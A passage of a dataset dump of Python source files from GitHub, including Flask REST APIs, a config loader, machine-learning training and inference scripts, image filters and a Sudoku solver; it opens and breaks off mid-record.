other.to_dict()\n","repo_name":"Apteco/apteco-api","sub_path":"pkg/apteco_api/models/date_rule.py","file_name":"date_rule.py","file_ext":"py","file_size_in_byte":26245,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"17636098500","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nfrom flask import Flask, jsonify, request\n\n# __name__ gives each file a unique name.\n# app is a new object of Flask class\napp = Flask(__name__)\n\n# tell the app what requests it'll\n# understand. 
Use decorators\n# http://google.com/\n\n# / : means root page or home page or an endpoint\n# simply a forward slash means home page\n\n\nstores = [\n\n {\n 'name': 'Store_1',\n 'items': [\n {\n 'name': 'lemon',\n 'price': '20'\n },\n {\n 'name': 'orange',\n 'price': '40'\n }\n\n ]\n\n },\n {\n 'name': 'Store_2',\n 'items': [\n {\n 'name': 'apple',\n 'price': '10'\n },\n {\n 'name': 'banana',\n 'price': '60'\n }\n\n ]\n }\n]\n\n\n@app.route('/')\ndef home():\n return 'Hello world!'\n\n\n@app.route('/store')\ndef get_stores():\n return jsonify({'stores': stores})\n\n\n@app.route('/store', methods=['POST'])\ndef create_store():\n request_data = request.get_json()\n new_data = {\n 'name': request_data['name'],\n 'items': []\n }\n stores.append(new_data)\n return jsonify(stores)\n\n\n@app.route('/store/')\ndef get_store(name):\n for x in stores:\n if x['name'] == name:\n return jsonify(x)\n return jsonify({'message': 'not found!'})\n\n\n@app.route('/store//item', methods=['POST'])\ndef create_item_in_store(name):\n request_data = request.get_json()\n for store in stores:\n if store['name'] == name:\n new_item = {\n 'name': request_data['name'],\n 'price': request_data['price']\n }\n store['items'].append(new_item)\n return jsonify(store['items'])\n return 'store not found'\n\n\n@app.route('/store//item')\ndef get_items_in_store(name):\n for store in stores:\n if store['name'] == name:\n return jsonify(store['items'])\n return 'not found'\n\n\n# http://localhost:5000/store/getSI/?a=Store_2&b=apple\n@app.route('/store/getSI/', methods=['GET'])\ndef getSI():\n for store in stores:\n if store['name'] == request.args.get('a'):\n for item in store['items']:\n if item['name'] == request.args.get('b'):\n return item['price']\n return 'store not found'\n\n\napp.run(port=5000)\n","repo_name":"aadityamenon29/Python-Flask-Udemy","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"20787987641","text":"#!/usr/bin/env python\n\nimport ConfigParser, io, logging, os\n\n# blank items will be filled in later (in set_session)\nCFGDEFAULTS = \"\"\"\n[filesystem]\nrawrepo: /data/raw\ndatarepo: /data/raw\ntmp: /scratch/tmp\nscratch: /scratch\nresultsrepo: /data/results\ncleanup: True\natlas: /atlas\n\n[clustering]\noptions:\nnjobs: 8\nnadjacent: 0\n\n[pixel clock]\nthreshold: 0.03\nrefractory: 44\nmincodetime: 441\ny: -28\nheight: 8.5\nscreenh: 64.54842055808264\nsepratio: 0.2\nminmatch: 10\nmaxerr: 0\nregex: pixel_clock([0-9])#[0-9]+\\.wav\n\n[audio]\nsamprate: 44100\nregex: input_([0-9])#[0-9]+\\.wav\n\n[mworks]\next: .h5\nfile: \n\n[epochs]\ntimeunit: mworks\nsettletime: 300\n\n[session]\nname: \ndir: \nscratch: \noutput: \noutputprefix: \n\n[probe]\nid: \noffset: \n\n[gdata]\nprobeid: tFAlHPctqL5YNf1oocFPLgA\nprobews: od6\nnotebookid: tHR87keGRC4XIZlX6uWi-vA\nnotebookws: od6\nemail:\npassword:\n\"\"\"\n\ndef load(session, customCfgFile = None):\n config = Config()\n config.read_user_config()\n config.read_session_config(session)\n config.set_session(session)\n if customCfgFile is not None: config.read(customCfgFile)\n return config\n\nclass Config(ConfigParser.SafeConfigParser):\n def __init__(self, *args, **kwargs):\n ConfigParser.SafeConfigParser.__init__(self, *args, **kwargs)\n # read in defaults\n self.readfp(io.BytesIO(CFGDEFAULTS))\n \n def read_user_config(self, homeDir=os.getenv('HOME')):\n filename = '/'.join((homeDir,'.physio'))\n if os.path.exists(filename):\n logging.debug(\"Found user cfg: 
%s\" % filename)\n self.read(filename)\n else:\n logging.warning('No user cfg found: %s' % filename)\n \n def read_session_config(self, session):\n filename = '/'.join((self.get('filesystem','datarepo'),session,'physio.ini'))\n if os.path.exists(filename):\n logging.debug(\"Found session cfg: %s\" % filename)\n self.read(filename)\n else:\n logging.warning('No session cfg found: %s' % filename)\n \n def set_session(self, session):\n self.set('session','name',session)\n \n if self.get('session','dir').strip() == '':\n self.set('session','dir','/'.join((self.get('filesystem','datarepo'),session)))\n \n if self.get('session','outputprefix').strip() == '':\n self.set('session','outputprefix','/'.join((self.get('filesystem','resultsrepo'),session)))\n \n if self.get('session','scratch').strip() == '':\n self.set('session','scratch','/'.join((self.get('filesystem','scratch'),session)))\n \n if self.get('mworks','file').strip() == '':\n self.set('mworks','file','/'.join((self.get('session','dir'),session + self.get('mworks','ext'))))\n \n # if self.get('pixel clock','scratch').strip() == '':\n # self.set('pixel clock','scratch','/'.join((self.get('session','scratch'),'pixel_clock')))\n \n def set_epoch(self, audioTimerange):\n epochDir = \"%s/%i_%i\" % (self.get('session','outputprefix'), int(audioTimerange[0]), int(audioTimerange[1]))\n self.set('session','output',epochDir)\n","repo_name":"coxlab/physiology_analysis","sub_path":"physio/cfg.py","file_name":"cfg.py","file_ext":"py","file_size_in_byte":3109,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"20585188625","text":"from flask import jsonify, request\nfrom employee_api import app, db, jwt\nfrom flask_jwt_extended import create_access_token, current_user,jwt_required\nfrom .models import User, Employee, EmployeeSchema\n\n\n\n\n#These first two functions return the user object (from the database) so that current_user can be used to access any authenticated user\n\n@jwt.user_identity_loader\ndef user_identity_lookup(user):\n\treturn user.id\n\n@jwt.user_lookup_loader\ndef user_lookup_callback(_jwt_header, jwt_data):\n\tidentity = jwt_data['sub']\n\treturn User.query.filter_by(id=identity).one_or_none()\n\n\n\n\n\n\n\n\n@app.route('/api/v1/')\ndef welcome_message():\n\treturn jsonify('It works'), 200\n\t\n\t\n@app.route('/api/v1/user/signup', methods=['POST'])\ndef user_signup():\n\ttry:\n\t\tdata = request.get_json()\n\t\tif User.query.filter_by(email=data['email']).first():\n\t\t\t#checks if the email already exists\n\t\t\treturn jsonify({'status':'failed','msg':'Email already exists'}), 400\n\t\tpassword = User.hash_password(data['password']) #hashes the password with sha256\n\t\tnew_user = User(email=data['email'],password=password)\n\t\tnew_user.create_user() # add user to database\n\t\treturn jsonify({'status':'success','msg':'Account created successfully'}), 201\n\texcept Exception as e:\n\t\tprint(e)\n\t\treturn jsonify({'status':'failed','msg':'Input is invalid'}), 422\n\t\t\n\t\t\n@app.route('/api/v1/user/login', methods=['POST'])\ndef user_login():\n\ttry:\n\t\tdata = request.get_json()\n\t\tuser = User.query.filter_by(email=data['email']).first()\n\t\tif user and User.verify_password(data['password'],user.password):\n\t\t\taccess_token = create_access_token(identity=user) #creates a JWT token\n\t\t\treturn jsonify({'status':'success','msg':'Login successful','access_token':access_token}), 200\n\t\treturn 
jsonify({'status':'failed','msg':'Invalid username or password'}), 403\n\texcept Exception as e:\n\t\tprint(e)\n\t\treturn jsonify({'status':'failed','msg':'Input is invalid'}), 422\n\t\n\t\t\n@app.route('/api/v1/employee', methods=['POST'])\n@jwt_required()\ndef add_employee():\n\ttry:\n\t\tdata = request.get_json()\n\t\temployee = Employee(first_name=data['first_name'],last_name=data['last_name'],\n\t\tage=data['age'], added_by=current_user)\n\t\temployee.create_employee()\n\t\treturn jsonify({'status':'success','msg':'Employee added successfully'}), 201\n\texcept Exception as e:\n\t\tprint(e)\n\t\treturn jsonify({'status':'failed','msg':'Invalid input or required data is missing'}), 422\n\t\t\n\t\t\n\n@app.route('/api/v1/employees', methods=['GET'])\n@jwt_required()\ndef get_employees():\n\ttry:\n\t\temployees = Employee.query.all()\n\t\tschema = EmployeeSchema(many=True)\n\t\temployees = schema.dump(employees)\n\t\treturn jsonify({'status':'success','employees':employees}), 200\n\texcept Exception as e:\n\t\tprint(e)\n\t\treturn jsonify({'status':'failed','msg':'An unknown error occured'}), 500\n\n\t\t\n@app.route('/api/v1/employee/', methods=['GET'])\n@jwt_required()\ndef get_employee(id):\n\ttry:\n\t\temployee = Employee.query.filter_by(id=id).first()\n\t\tif employee:\n\t\t\tschema = EmployeeSchema()\n\t\t\temployee = schema.dump(employee)\n\t\t\treturn jsonify({'status':'success','employee':employee}), 200\n\t\treturn jsonify({'status':'failed','msg':f'Employee with id {id} not found'}), 404\n\texcept Exception as e:\n\t\tprint(e)\n\t\treturn jsonify({'status':'failed','msg':'An unknown error occured'}), 500\n\t\t\n\t\t\n@app.route('/api/v1/employee/', methods=['PUT'])\n@jwt_required()\ndef update_employee(id):\n\ttry:\n\t\tdata = request.get_json()\n\t\temployee = Employee.query.filter_by(id=id).first()\n\t\tif employee:\n\t\t\tif employee.added_by.id == current_user.id:\n\t\t\t\t#makes sure that only the user who added this employee can update it\n\t\t\t\temployee.first_name = data.get('first_name',employee.first_name)\n\t\t\t\temployee.last_name = data.get('last_name', employee.last_name)\n\t\t\t\temployee.age = data.get('age',employee.age)\n\t\t\t\tdb.session.commit()\n\t\t\t\tschema = EmployeeSchema()\n\t\t\t\temployee = schema.dump(employee)\n\t\t\t\treturn jsonify({'status':'success','msg':'Update successful','employee':employee}), 200\n\t\t\treturn jsonify({'status':'failed','msg':'Operation not permitted'}), 401\n\t\treturn jsonify({'status':'failed','msg':'Employee not found'}), 404\n\texcept Exception as e:\n\t\tprint(e)\n\t\treturn jsonify({'status':'failed','msg':'Invalid input'}), 422\n\n\t\t\n@app.route('/api/v1/employee/', methods=['DELETE'])\n@jwt_required()\ndef delete_employee(id):\n\ttry:\n\t\temployee = Employee.query.filter_by(id=id).first()\n\t\tif employee:\n\t\t\tif employee.added_by.id == current_user.id:\n\t\t\t\t#ensures only users who added that employee could delete it\n\t\t\t\tdb.session.delete(employee)\n\t\t\t\tdb.session.commit()\n\t\t\t\treturn jsonify({'status':'success','msg':'Employee deleted successful'}), 200\n\t\t\treturn jsonify({'status':'failed','msg':'Operation not permitted'}), 401\n\t\treturn jsonify({'status':'failed','msg':'Employee not found'}), 404\n\texcept Exception as e:\n\t\tprint(e)\n\t\treturn jsonify({'status':'failed','msg':'Invalid input'}), 
422\n\t\n\t\t\n","repo_name":"marvelous-benji/employee-api","sub_path":"employee_api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"39809647536","text":"import sys\nimport os\nprint(os.getcwd())\nsys.path.append('/opt/cocoapi/PythonAPI')\nfrom PIL import Image\nimport torch\nimport pickle\nfrom model import EncoderCNN, DecoderRNN\nfrom torchvision import transforms\n\nfrom matplotlib import pyplot as plt\ndef load_vocab():\n dict_object = pickle.load(open('vocab.pkl',\"rb\"))\n return dict_object.idx2word\n\n\ndef create_model():\n encoder_file = \"encoder-1.pkl\"\n decoder_file = \"decoder-1.pkl\"\n embed_size = 256\n hidden_size = 512\n vocab_size = 9955\n encoder = EncoderCNN(embed_size)\n encoder.eval()\n decoder = DecoderRNN(embed_size, hidden_size, vocab_size)\n decoder.eval()\n encoder.load_state_dict(torch.load(os.path.join('./models', encoder_file),map_location=torch.device('cpu')))\n decoder.load_state_dict(torch.load(os.path.join('./models', decoder_file),map_location=torch.device('cpu')))\n encoder.to('cpu')\n decoder.to('cpu')\n return encoder,decoder\n\ndef clean_sentence(output,idx2word):\n caption = list()\n sentence = \"\"\n\n for i in output:\n if (i == 1):\n continue\n caption.append(idx2word[i])\n\n caption = caption[1:-1]\n\n sentence = ' '.join(caption)\n\n sentence = sentence.capitalize()\n return sentence\n\ndef transform_image(transform_test,image_file):\n path = 'images/'\n image = Image.open(path+image_file)\n image = transform_test(image)\n image = torch.unsqueeze(image, dim=0)\n return image\n\ndef prediction(encoder,decoder,transform_test,idx2word,image_file_list):\n for image_file in image_file_list:\n features = encoder(transform_image(transform_test,image_file)).unsqueeze(1)\n output = decoder.sample(features)\n print(image_file+\": \"+clean_sentence(output,idx2word))\n plt.show()\n\nif __name__ == \"__main__\":\n\n sys.path.append('/opt/cocoapi/PythonAPI')\n\n transform_test = transforms.Compose([\n transforms.Resize(256),\n transforms.RandomCrop(224),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n transforms.Normalize((0.485, 0.456, 0.406),\n (0.229, 0.224, 0.225))])\n\n image_file_list = ['COCO_test2014_000000000001.jpg',\n 'COCO_test2014_000000000014.jpg',\n 'COCO_test2014_000000000016.jpg',\n 'COCO_test2014_000000000027.jpg',\n 'COCO_test2014_000000000057.jpg',\n 'COCO_test2014_000000000063.jpg',\n 'COCO_test2014_000000000069.jpg',\n 'coco.JPG',\n 'food.JPG']\n\n\n encoder,decoder = create_model()\n idx2word = load_vocab()\n prediction(encoder,decoder,transform_test,idx2word,image_file_list)\n","repo_name":"karanthacker/ImageCaptioning","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":2739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"17046813651","text":"import hydra\nimport wandb\nimport logging\nimport random\nfrom pytorch_lightning.loggers import CometLogger\n\nfrom omegaconf import DictConfig\nfrom pytorch_lightning import LightningDataModule, Trainer\nfrom pytorch_lightning.loggers import WandbLogger\nfrom pytorch_lightning.callbacks import LearningRateMonitor\nfrom pytorch_lightning.callbacks import ModelCheckpoint\n\nfrom src.models import LitModel\nfrom src.utils import log_hyperparams\n\nlog = 
logging.getLogger(__name__)\nlogging.getLogger(\"pytorch_lightning\").setLevel(logging.ERROR)\n\n\ndef get_checkpointing_callback(config):\n    optional_str = \"\"\n    # use hex to generate unique id\n    random_str = hex(random.randint(0, 2**32))[2:]\n    checkpoint_callback = ModelCheckpoint(\n        dirpath=f\"checkpoints/{config.model.mode}/{random_str}/\",\n        filename=f\"{config.mode}_{optional_str}_{{epoch:02d}}\",\n    )\n    return checkpoint_callback\n\n\ndef train(config: DictConfig, model=None):\n    log.info(f\"Instantiating logger <{config.logger._target_}>\")\n\n    current_name = f\"{config.datamodule.dataset}:{config.model.arch}:{config.mode}\"\n    if config.mode == \"finetune_layers\":\n        current_name += f\":{config.model.layers_to_finetune}\"\n\n    logger: WandbLogger = hydra.utils.instantiate(config.logger, name=current_name)\n\n    log.info(f\"Instantiating datamodule <{config.datamodule._target_}>\")\n    datamodule: LightningDataModule = hydra.utils.instantiate(config.datamodule)\n\n    if model is None:\n        log.info(f\"Instantiating model <{config.model._target_}>\")\n        model: LitModel = hydra.utils.instantiate(config.model)\n\n    lr_monitor = LearningRateMonitor(logging_interval=\"epoch\")\n    checkpointer = get_checkpointing_callback(config)\n    callbacks = [lr_monitor, checkpointer]\n\n    log.info(f\"Instantiating trainer <{config.trainer._target_}>\")\n    trainer: Trainer = hydra.utils.instantiate(\n        config.trainer,\n        logger=logger,\n        num_sanity_val_steps=0,\n        callbacks=callbacks,\n    )\n    print(f\"precision {trainer.precision}\")\n\n    log.info(\"Logging hyperparameters!\")\n    log_hyperparams(config=config, trainer=trainer)\n\n    log.info(\"Starting training!\")\n    trainer.fit(model=model, datamodule=datamodule)\n\n    wandb.finish()\n\n    acc = trainer.callback_metrics[\"pred_acc\"]\n\n    return acc.item()","repo_name":"talswisa/SubTuning","sub_path":"src/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2293,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"}
{"seq_id":"13713414068","text":"## Pizza Place\n\n#At Angelo’s Pizza Wheels, you have: \n#Three sauce options (red, white, and pesto)\n#Three cheese options (mozzarella, feta, and ricotta)\n#Eight toppings (olives, mushrooms, peppers, pepperoni, sausage, meatballs, arugula, and prosciutto)\n#Two glazes (olive oil and balsamic)\n\n#\n\nbasePizza =8\nitemizedBasePizzaPrice = 2\n#sauce\nred = 2\nwhite = 1\npesto =3\n\n# cheese\nmozzarella = 2\nfeta = 1\nricotta = 3\n\n# toppings\nolives = 0.5\nmushrooms = 0.5\npeppers = 0.5\npepperoni = 0.5\nsausage = 0.5\nmeatballs = 0.5\narugula = 0.5\nprosciutto = 0.5\n\n#premium toppings\nburrata = 2.50\navocado = 2.50\nbbqChicken = 2.50\n\n\n\ntoppings = [\"olives\", \"mushrooms\", \"peppers\", \"pepperoni\", \"sausage\", \"meatballs\", \"arugula\", \"prosciutto\" ]\npremiumtoppings = [\"burrata\", \"avocado\", \"bbqChicken\"]\n\ndef CalculateItemizedPizzaPrice(sauce, cheese, toppings, glaze): \n    return CalculateSaucePrice(sauce) + CalculateCheesePrice(cheese)\n    \n    \ndef CalculateSaucePrice(sauce):\n    if(sauce == \"red\"): \n        sPrice= red\n    if(sauce == \"white\"): \n        sPrice= white\n    if(sauce == \"pesto\"): \n        sPrice= pesto   \n    return sPrice\n\ndef CalculateCheesePrice(cheese):\n    if(cheese == \"mozzarella\"): \n        cPrice= mozzarella\n    if(cheese == \"feta\"): \n        cPrice= feta\n    if(cheese == \"ricotta\"): \n        cPrice= ricotta   \n    return cPrice\n\n\n\ndef CalculatePizzaPrice(toppings):\n    return basePizza+(toppings*.5)\n\ndef CalculatePizzaPriceWithPremium(toppings, premium_toppings):\n    return 
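The checkpoint callback in the train.py record above derives its run directory from 32 random bits; a sketch of an alternative (my assumption, not the SubTuning code) that uses uuid4, whose full hex string carries 122 random bits and so is far less collision-prone:

import uuid

# hypothetical replacement for hex(random.randint(0, 2**32))[2:]
random_str = uuid.uuid4().hex   # e.g. '9f86d081884c7d65...'
print(random_str)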
CalculatePizzaPrice(toppings)+(premium_toppings*2)\n\n\norder1 = CalculatePizzaPrice(2)\nprint(\"Order1: \" + str(order1))\n\norder2 = CalculatePizzaPrice(3)\nprint(\"Order2: \" + str(order2))\n\norder3 = CalculatePizzaPriceWithPremium(3,5)\nprint(\"Order3: \" + str(order3))\n\n","repo_name":"DataScienceWorkSpace/data-analytics-portfolio","sub_path":"Activity132.py","file_name":"Activity132.py","file_ext":"py","file_size_in_byte":1727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"74931889125","text":"#!/usr/bin/python\n# -*- coding:utf-8 -*-\nimport cv2\nimport numpy as np\n\nfn = \"images/for_test.jpg\"\nsrc_img = cv2.imread(fn)\nimg = cv2.cvtColor(src_img, cv2.COLOR_BGR2GRAY)\n\n# add salt noise (random white pixels)\n\nw, h = img.shape[1], img.shape[0]  # image width and height\nnew_img = np.array(img)\n# the number of noise dots\nnoise_count = 60000\nfor k in range(0, noise_count):\n\txi = int(np.random.uniform(0, new_img.shape[1]))\n\txj = int(np.random.uniform(0, new_img.shape[0]))\n\tnew_img[xj, xi] = 255\n\ncv2.imshow('src noised sample_img', new_img)\n\n# median filter\nmfiltered_img = cv2.medianBlur(new_img, 5)\ncv2.imshow('median filter', mfiltered_img)\n# average filter\nafiltered_img = cv2.blur(new_img, (5, 5))\ncv2.imshow('average filter', afiltered_img)\n# gaussian filter\ngfiltered_img = cv2.GaussianBlur(new_img, (5, 5), 0)\ncv2.imshow('gaussian filter', gfiltered_img)\n# bilateral filter\nbfiltered_img = cv2.bilateralFilter(new_img, 9, 75, 75)\ncv2.imshow('bilateral filter', bfiltered_img)\n\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n","repo_name":"SimonCqk/Python_Toys","sub_path":"opencv/img_filters.py","file_name":"img_filters.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"30093491277","text":"import pygame\nfrom justwar.data.Config import Config\nfrom justwar.data.GameElement import GameElement\nfrom random import randint\n\nclass Gate(GameElement):\n\n\tdef __init__(self, direction):\n\n\t\tGameElement.__init__(self)\n\n\t\tself.direction = direction\n\n\t\tself.shape = self.load_image(\"gate.png\")\n\t\tself.coord = ( Config.screenWidth-600, 0 ) \n\n\t\tif direction == 1:\n\t\t\tself.shape = pygame.transform.rotate(self.shape, -90)\n\t\t\tself.coord = ( Config.screenWidth-self.shape.get_width()-10, Config.screenHeight-370 )\n\n\t\tif direction == 2:\n\t\t\tself.shape = pygame.transform.rotate(self.shape, -180)\n\t\t\tself.coord = ( Config.screenWidth-600, Config.screenHeight-self.shape.get_height() )\n\n\t\tif direction == 3:\n\t\t\tself.shape = pygame.transform.rotate(self.shape, 90)\n\t\t\tself.coord = ( 0+10, Config.screenHeight-370 )\n\n\t\tself.width = self.shape.get_width()\n\t\tself.height = self.shape.get_height()\n\n\t\tself.rect = pygame.Rect(self.coord,(self.width, self.height))\n\n\n\tdef Show(self, surface):\n\t\tsurface.blit(self.shape, self.coord)\n","repo_name":"PanosRCng/just_war","sub_path":"justwar/data/Gate.py","file_name":"Gate.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"14196898614","text":"import numpy as np\nimport pandas as pd\n\n\ndef update_missing_values(groups: dict, freq: str):\n    \"\"\"\n    Update the missing values in the 'data', 'full_data', 'data_matrix', and 'dates' arrays with np.nan\n\n    Args:\n        groups: dictionary containing the data and metadata\n        freq: frequency string used to rebuild the complete date range\n    \"\"\"\n    for key in ['train']:\n        x_values = 
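The salt-noise loop in img_filters.py above can be vectorized; a minimal numpy-only sketch (a toy black image stands in for the test photo, and the seed is arbitrary):

import numpy as np

rng = np.random.default_rng(0)
img = np.zeros((480, 640), dtype=np.uint8)        # stand-in grayscale image
rows = rng.integers(0, img.shape[0], size=60000)
cols = rng.integers(0, img.shape[1], size=60000)
img[rows, cols] = 255                             # white salt pixels
print(int(img.sum() // 255))                      # roughly 60000, minus collisions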
groups[key]['x_values']\n data = groups[key]['data']\n s = groups[key]['s']\n\n # Change the data type of the arrays to float\n data = data.astype(float)\n\n # Identify the missing indices in x_values\n missing_indices = sorted(set(range(max(x_values) + 1)) - set(x_values))\n\n # Update the 'data' array with np.nan for the missing values\n for missing_idx in missing_indices:\n insert_idx = missing_idx * s\n data = np.insert(data, insert_idx, [np.nan] * s)\n\n # Update the 'n' value in the metadata\n groups[key]['n'] = len(x_values) + len(missing_indices)\n\n full_data = groups[key]['full_data']\n full_data = full_data.astype(float)\n groups[key]['data'] = data\n\n # Update the 'full_data' array with np.nan for the missing values\n for missing_idx in missing_indices:\n insert_idx = missing_idx * s\n full_data = np.insert(full_data, insert_idx, [np.nan] * s)\n\n groups[key]['full_data'] = full_data\n\n # Update the 'dates' array to fill in missing dates\n dates = groups['dates']\n start_date = dates[0]\n end_date = dates[-1]\n all_dates = pd.date_range(start_date, end_date, freq=freq)\n missing_dates = all_dates.difference(pd.to_datetime(dates))\n\n for missing_date in missing_dates:\n insert_idx = all_dates.get_loc(missing_date)\n dates.insert(insert_idx, missing_date)\n\n groups['dates'] = dates\n\n return groups\n\n","repo_name":"luisroque/run_hierarchical_forecasting_models","sub_path":"htsmodels/preprocessing/subsampled_dataset.py","file_name":"subsampled_dataset.py","file_ext":"py","file_size_in_byte":1820,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"15470885309","text":"import torch\nimport numpy as np\nimport glob\nimport uproot\n# from torch_cmspepr.dataset import incremental_cluster_index_np\n\ndef get_model():\n from torch_cmspepr.gravnet_model import GravnetModelWithNoiseFilter\n model = GravnetModelWithNoiseFilter(input_dim=9, output_dim=6, k=50, signal_threshold=.05)\n ckpt = 'ckpt_train_taus_integrated_noise_Oct20_212115_best_397.pth.tar'\n model.load_state_dict(torch.load(ckpt, map_location=torch.device('cpu'))['model'])\n return model\n\n\ndef interface():\n t = uproot.open('hgcalNtuple_Nov16_2021.root')['ana']['hgc']\n arrays = t.arrays()\n print (arrays)\n with torch.no_grad():\n model = get_model() #torch.load('gravnetwithnoisefilter.model')\n print ('here after loading the model')\n model.eval()\n print ('here after evaluating the model')\n for i in range(t.num_entries):\n if i == 2: break\n #e = np.array(arrays['RecHitHGC_energy'][i])\n #x = np.array(arrays['RecHitHGC_x'][i])\n #y = np.array(arrays['RecHitHGC_y'][i])\n #z = np.array(arrays['RecHitHGC_z'][i])\n #t = np.array(arrays['RecHitHGC_time'][i])\n e = np.array(arrays['rechit_energy'][i])\n x = np.array(arrays['rechit_x'][i])\n y = np.array(arrays['rechit_y'][i])\n z = np.array(arrays['rechit_z'][i])\n t = np.array(arrays['rechit_time'][i])\n\n nhits = e.shape[0]\n\n r = np.sqrt(x**2 + y**2 + z**2)\n\n d = np.sqrt(x**2 + y**2)\n theta = np.arctan2(d, z)\n eta = -np.log(np.tan(theta/2.))\n\n # Make sure phi is within -pi..pi\n phi = np.arctan2(x, y) % (2.*np.pi)\n phi[phi > np.pi] -= 2.*np.pi\n\n features = np.vstack((\n e,\n eta,\n np.zeros_like(e),\n theta,\n r,\n x,\n y,\n z,\n t\n )).T\n\n assert features.shape == (nhits, 9)\n print ('here after defining features')\n # This should be the truth clustering\n #y = np.array(arrays['RecHitHGC_BestMergedSimClusterIdx'][i])\n # y = incremental_cluster_index_np(y, noise_index=-1)\n #assert y.shape == 
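update_missing_values above rebuilds a complete date index with pd.date_range; the same gap-filling idea on toy data, as a self-contained pandas sketch:

import pandas as pd

dates = pd.to_datetime(["2021-01-01", "2021-01-03"])        # Jan 2 is missing
full_index = pd.date_range(dates[0], dates[-1], freq="D")
series = pd.Series([1.0, 3.0], index=dates).reindex(full_index)
print(series.isna().sum())                                  # 1 -> the missing day became NaN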
(nhits,)\n\n\n X = torch.Tensor(features)\n batch = torch.zeros(nhits, dtype=torch.long)\n print (\"X = \", X)\n scores_noise_filter, pass_noise_filter, out_gravnet = model(X, batch)\n print (\"scores_noise_filter = \", scores_noise_filter)\n print(scores_noise_filter, pass_noise_filter, out_gravnet)\n\n\n\nif __name__ == '__main__':\n interface()\n","repo_name":"Saptaparna/FastTiming","sub_path":"Production_12X/ForACAT/ParseOutput/interface_single_photons.py","file_name":"interface_single_photons.py","file_ext":"py","file_size_in_byte":2718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"7141658167","text":"import numpy as np # linear algebra\r\nimport pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)\r\nimport scipy.sparse as scs # sparse matrix construction \r\nimport scipy.linalg as scl # linear algebra algorithms\r\nimport scipy.optimize as sco # for minimization use\r\nimport matplotlib.pylab as plt # for visualization\r\nfrom numpy import linalg as LA\r\ndef fixed_constraints(N=9):\r\n rowC = np.zeros(N)\r\n rowC[0] =1\r\n rowR = np.zeros(N)\r\n rowR[0] =1\r\n row = scl.toeplitz(rowC, rowR)\r\n ROW = np.kron(row, np.kron(np.ones((1,N)), np.eye(N)))\r\n \r\n colR = np.kron(np.ones((1,N)), rowC)\r\n col = scl.toeplitz(rowC, colR)\r\n COL = np.kron(col, np.eye(N))\r\n \r\n M = int(np.sqrt(N))\r\n boxC = np.zeros(M)\r\n boxC[0]=1\r\n boxR = np.kron(np.ones((1, M)), boxC) \r\n box = scl.toeplitz(boxC, boxR)\r\n box = np.kron(np.eye(M), box)\r\n BOX = np.kron(box, np.block([np.eye(N), np.eye(N) ,np.eye(N)]))\r\n \r\n cell = np.eye(N**2)\r\n CELL = np.kron(cell, np.ones((1,N)))\r\n \r\n return scs.csr_matrix(np.block([[ROW],[COL],[BOX],[CELL]]))\r\n\r\n\r\n# For the constraint from clues, we extract the nonzeros from the quiz string.\r\ndef clue_constraint(input_quiz, N=9):\r\n m = np.reshape([int(c) for c in input_quiz], (N,N))\r\n r, c = np.where(m.T)\r\n v = np.array([m[c[d],r[d]] for d in range(len(r))])\r\n \r\n table = N * c + r\r\n table = np.block([[table],[v-1]])\r\n \r\n # it is faster to use lil_matrix when changing the sparse structure.\r\n CLUE = scs.lil_matrix((len(table.T), N**3))\r\n for i in range(len(table.T)):\r\n CLUE[i,table[0,i]*N + table[1,i]] = 1\r\n # change back to csr_matrix.\r\n CLUE = CLUE.tocsr() \r\n \r\n return CLUE\r\n\r\n\r\nfrom collections import defaultdict\r\ndef boxes():\r\n\r\n index = defaultdict(list)\r\n ind = []\r\n for i in range(9):\r\n for j in range(9):\r\n ind.append([i,j])\r\n res1 = []\r\n res2 = []\r\n res3 = []\r\n res4 = []\r\n res5 = []\r\n res6 = []\r\n res7 = []\r\n res8 = []\r\n res9 = []\r\n for item in ind:\r\n i = item[0]\r\n j = item[1]\r\n if i%9>=0 and i%9<=2:\r\n if j%9>=0 and j%9<=2:\r\n res1.append(item)\r\n if i%9>=0 and i%9<=2:\r\n if j%9>=3 and j%9<=5:\r\n res2.append(item)\r\n if i%9>=0 and i%9<=2:\r\n if j%9>=6 and j%9<=8:\r\n res3.append(item)\r\n if i%9>=3 and i%9<=5:\r\n if j%9>=0 and j%9<=2:\r\n res4.append(item)\r\n\r\n if i%9>=3 and i%9<=5:\r\n if j%9>=3 and j%9<=5:\r\n res5.append(item)\r\n if i%9>=3 and i%9<=5:\r\n if j%9>=6 and j%9<=8:\r\n res6.append(item)\r\n if i%9>=6 and i%9<=8:\r\n if j%9>=0 and j%9<=2:\r\n res7.append(item)\r\n\r\n if i%9>=6 and i%9<=8:\r\n if j%9>=3 and j%9<=5:\r\n res8.append(item)\r\n if i%9>=6 and i%9<=8:\r\n if j%9>=6 and j%9<=8:\r\n res9.append(item)\r\n box = [res1, res2, res3, res4, res5, res6, res7, res8, res9]\r\n return box\r\nfrom collections import defaultdict\r\ndef repeats(matrix, original):\r\n 
